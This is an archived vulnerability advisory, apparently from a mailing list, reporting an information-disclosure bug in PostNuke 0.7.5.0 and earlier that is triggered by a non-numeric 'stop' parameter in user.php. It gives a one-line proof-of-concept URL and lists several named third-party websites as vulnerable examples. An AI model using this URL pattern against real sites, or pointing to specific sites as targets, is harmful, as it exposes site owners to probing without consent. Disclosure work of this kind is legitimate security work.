AOH :: HP Unsorted P :: B06-5959.HTM

PostNuke vuln



Vulnerability in PostNuke
Vulnerability in PostNuke



Error PostNuke in the variable stop which can be exploited by malicious 
people to disclose system information. Luckily the  vulnerability 
affects to the 0.7.5.0 version and minors.

POC:
http://www.[web-with-PostNuke].com/user.php?stop=a (no numeric value) 
Example:
http://www.dev-postnuke.com/user.php?stop=a 
http://www.americavivetv.com/user.php?stop=a 
http://www.ciberpsique.net/user.php?stop=a 
http://www.bonsaiabm.com/user.php?stop=a 
http://www.elrincondejada.net/user.php?stop=a 
http://www.salsa.org.pl/user.php?stop=a 
http://www.choco.org/user.php?stop=a 


by rMrGvG

http://SNI-LABS.com 
since 1998

----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.


The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.